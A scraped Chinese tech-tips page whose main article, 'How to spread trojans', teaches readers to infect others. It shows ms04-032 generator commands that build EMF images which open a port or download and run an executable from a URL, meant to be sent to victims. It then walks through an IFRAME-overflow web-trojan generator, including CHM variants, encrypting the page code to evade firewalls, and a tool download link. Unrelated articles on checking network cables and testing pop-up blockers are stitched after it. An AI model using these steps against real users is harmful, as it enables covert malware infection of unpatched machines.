热点推荐:
您现在的位置: 电脑学习网 >> 网络技术 >> 正文

如何传播木马

2013-09-12 16:07:24  来源: 网络技术 

  各式各样的木马程序之所以会在网络上横行,网页传播是功不可没的。相对于其他传播途径,网页传播的危害面非常广泛,而IE层出不穷的漏洞也使很多朋友在不知不觉中中招。这一期的木马屠城,笔者就针对如何传播木马这一问题,对最近较经典的网页木马传播方式进行剖析,让大家知道这些“夹心”网页中的木马是怎样将用户杀于无形之中的。
图形渲染漏洞
  大家可曾想过浏览一个图片文件就会中木马,并且还不是以前的那种以“.JPEG”结尾的木马,因为Windows又给黑客们爆出了一个更新的可利用漏洞。(本文为WWW.SQ120.COM电脑知识网推荐文章)
  在Windows XP SP1、Windows Server 2003、Windows 2000 SP4中,系统对Windows图像文件(WMF)和增强型图像文件(EMF)图像格式进行的渲染存在一个远程代码执行漏洞,它使得恶意攻击者可以在受影响的系统上执行远程代码。漏洞的利用十分简单,我们只需要使用ms04-032溢出程序即可生成带溢出效果的EMF图片。
  进入命令提示符窗口,输入格式为“ms04-32.exe <生成的文件名> <生成方式> <端口号(溢出方式①)/下载程序地址(溢出方式②)>”的命令。www.ITCoMpuTEr.CoM.Cn
  提示:溢出方式可分为“1-端口方式溢出”和“2-下载溢出”。
  例如输入“ms04-32 1.emf 1 21”,这样就生成了一个可以打开21端口的EMF图片(图1)。图1
  提示:输入“ms04-32 test.emf 2 http://www.xxx.xxx/xxx.exe”,就生成了一个可以自动在http://www.xxx.xxx/xxx.exe下载并自动运行xxx.exe这个程序的EMF图片。
  现在只要把此图片上传到自己的空间,然后将图片地址发给对方,没有及时更新补丁的用户看了图片后就会在不知情的情况下中招。
IFRAME溢出型木马
  在这里笔者要给大家介绍的是如何让对方通过访问一个看似平常的网页,而不知不觉地中木马。这是网页木马传播最主要的途径,因为看似平常的网页浏览,也会带来很多严重的后果。
  当IFRAME溢出公布后,网上就有高手针对已经公布的恶意代码进行了修改并写成了专门的木马生成器,使得它能顺利地工作在Windows 98、Windows Me、Windows 2000、Windows XP SP1(IE6)等系统下。由于它的危害很大,安装了IE6的电脑会受到iFrame漏洞的影响(不包括已升级到Windows XP SP2的系统)。
  运行wymmpro.exe程序后,出现如图2所示的界面。首先在第一行填入已准备好的木马程序路径(网络路径),接下来在第二栏中选择IE的弹出方式和自定义生成的木马网页名。建议大家选择第一项,这样就可防止某些系统拦截所弹出的窗口。 

图2
  接下来在第三栏中选择默认的大内存方式(用于网页木马)。为了防止对方使用的是IE5.0/5.5而不会中招,我们可以在此生成CHM木马来达到传播的目的,我们只需要把准备好的木马程序放到木马生成器的CHM目录下,并根据提示填写好木马程序名和欲生成的CHM文件名以及用来存放该CHM的网络地址即可。
  最后就是包装工作,我们可以选择对生成的网页木马代码进行压缩或加密,防止被带网页代码监控功能的防火墙拦截。现在,一个活生生的网页木马就制作好了。
  软件下载地址:http://www.sixvee.com/520yy/tools/cytkk-3.rar

 
如何鉴别双绞线的优劣? 1.看
(1)看包装箱质地和印刷。仔细查看线缆的箱体,包装是否完好,假货在这方面是能省就省的,所以外包装质量可以决定用户的第一感觉。真品双绞线的包装纸箱,从材料质地到文字印刷都应当相当不错,纸板挺括边缘清晰。而且许多厂家还在产品外包装上贴上了防伪标志。
(2)看外皮颜色及标识。双绞线绝缘皮上应当印有诸如厂商产地、执行标准、产品类别(如CAT5e、C6T等)、线长标识之类的字样。
(3)看绞合密度。为了降低信号的干扰,双绞线电缆中的每一线对都以逆时针方向相互绞合(也称扭绕)而成,同一电缆中的不同线对也具有不同的绞合度。除线对的两条绝缘铜导线要按要求进行绞合外,电缆中的线对之间也要按逆时针方向进行绞合。如果绞合密度不符合技术要求,将由于电缆电阻的不匹配,导致较为严重的近端串扰,从而缩短传输距离、降低传输速率。如果发现电缆中所有线对的扭绕密度相同,或线对的扭绕密度不符合技术要求,或线对的扭绕方向不符合要求,均可判定为伪品。
(4)看导线颜色。剥开双绞线的外层胶皮后,可以看到里面由颜色不同的四对八根细线,依次为橙、绿、蓝、棕,每一对线中有一根色线和一根混色线组成。需要注意的是,这些颜色绝对不是后来用染料染上去的,而是使用相应的塑料制成的。没有颜色、颜色不清或染色的网线,肯定不是真线。(本文为WWW.SQ120.COM电脑知识网推荐文章)
(5)看阻燃情况。为了避免受高温或起火而导致线缆的燃烧和损坏,双绞线最外面的一层包皮除应具有很好的抗拉特性外,还应具有阻燃性。正品网线的外皮会在焰火的烧烤之下,逐步被熔化变形,但外皮肯定不会自己燃烧。不阻燃的线肯定不是真品。
2.摸
(1)在通常的情况下也可以通过手指触摸双绞线的外皮来做最初的判断。假线为节省成本,采用低劣的线材,手感发粘,有一定的停滞感,质量很差。真线手感舒服,外皮光滑。
(2)用手捏一捏线体,手感应当饱满。线缆还应当可以随意弯曲,以方便布线。考虑到网线在布线时经常需要弯曲,因此许多正规厂商在制作网线都给外皮留有了一定的伸展性,以保证网线在弯曲时不受损伤。因此,双手用力拉正规网线时,发现外皮都具有伸展性。品质良好的网线在设计时考虑到布线的方便性,尽量做到很柔韧,无论怎样弯曲都很方便,而且不容易被折断。为了使双绞线在移动中不致于断线,除外皮保护层外,内部的铜芯还要具有一定的韧性。铜芯既不能太软,也不能太硬,太软或太硬都表明铜的纯度不够,将严重影响网线的电气性能。  
如何禁止弹出广告

  弹出的广告窗口实在烦人,因此,现在很多浏览器产品纷纷推出封杀广告窗口功能。例如TT、Maxthon、GreenBrowser、Opera等。但是,我们在使用这些浏览器或是广告封杀程序时,时不时还会弹出一两个广告窗口。今天笔者就教大家一招来检测自己的浏览器或广告封杀程序的广告封杀能力到底有多强,是不是百分百的称职。
  Step1:打开你要检测的浏览器,下面笔者就以腾讯浏览器Tencent Traveler(下文简称TT)为例来介绍。然后在地址栏中输入http://www.kephyr.com/popupkillertest/并回车打开检测页面,然后点击其中的“Test”链接。
  Step2:在切换到检测向导的页面中点击“Start Test”链接进入一共21种不同弹出窗口的检测向导的第一步,如图所示:


 
  当你进入如图所示的页面中时,网站会自动弹出一个广告窗口,如果你的浏览器或是广告封杀程序能够将它封杀,你就不会看到弹出的窗口,如果你的浏览器或是广告封杀程序无法对付这种类型的弹出广告窗口,你将会看到显示“A bad pop up!It should be closed by your pop-up killer.”的页面。
  整个测试过程一共是21步,也对应着21种情况下弹出的广告窗口。例如:普通弹出广告窗口,询问是否将当前页设为你的主页弹出窗口,是否将当前页添加到浏览器的书签中的弹出窗口,弹出的Flash广告窗口等。另外,有的时候,一些弹出窗口是有用的,例如多窗口浏览器点击链接后打开的新窗口,这个窗口是正常的弹出窗口,一般浏览器本身是不会封杀的,最主要就是那些第三方广告封杀程序经常会误封杀。而测试向导也会对这种情况下的广告封杀程序进行检测。如果是正常的话,将会打开显示“A useful pop up! Should NOT be closed by your pop up killer.”的页面。
  如果测试向导在测试这类型的弹出窗口时,广告封杀程序将它封杀了,那你必须重新设置程序的封杀参数了,否则将会影响你正常地使用浏览器浏览网页了。
  提示:检测向导在检测时,还会在提示窗口中提示哪些浏览器可以在不安装第三方广告封杀程序的情况下,会自行屏蔽该类弹出窗口。
  最后,如果你使用的浏览器的广告封杀能力太弱,而又没安装第三方广告封杀程序,检测网站上也提供了一些广告封杀程序的下载链接,你可以直接从上面下载并安装。另外,比较好用的一些第三方的广告封杀程序也有不少:http://www.skycn.com/soft/9355.html可以下载的“兰陵弹出广告克星”,http://www.skycn.com/soft/11920.html可以下载的“弹出广告终极杀手”等。而直接具有广告封杀功能的浏览器也有不少:TT、Opera,Maxthon、Mozilla 、Netscape等,它们自身对弹出广告的封杀能力相当强大,使用它们就不用再安装第三方广告封杀程序了,非常方便!

 
From:http://www.itcomputer.com.cn/Article/Network/201309/1039.html
  • 上一篇文章:

  • 下一篇文章:
  • Copyright © 2005-2013 电脑知识网 Computer Knowledge   All rights reserved.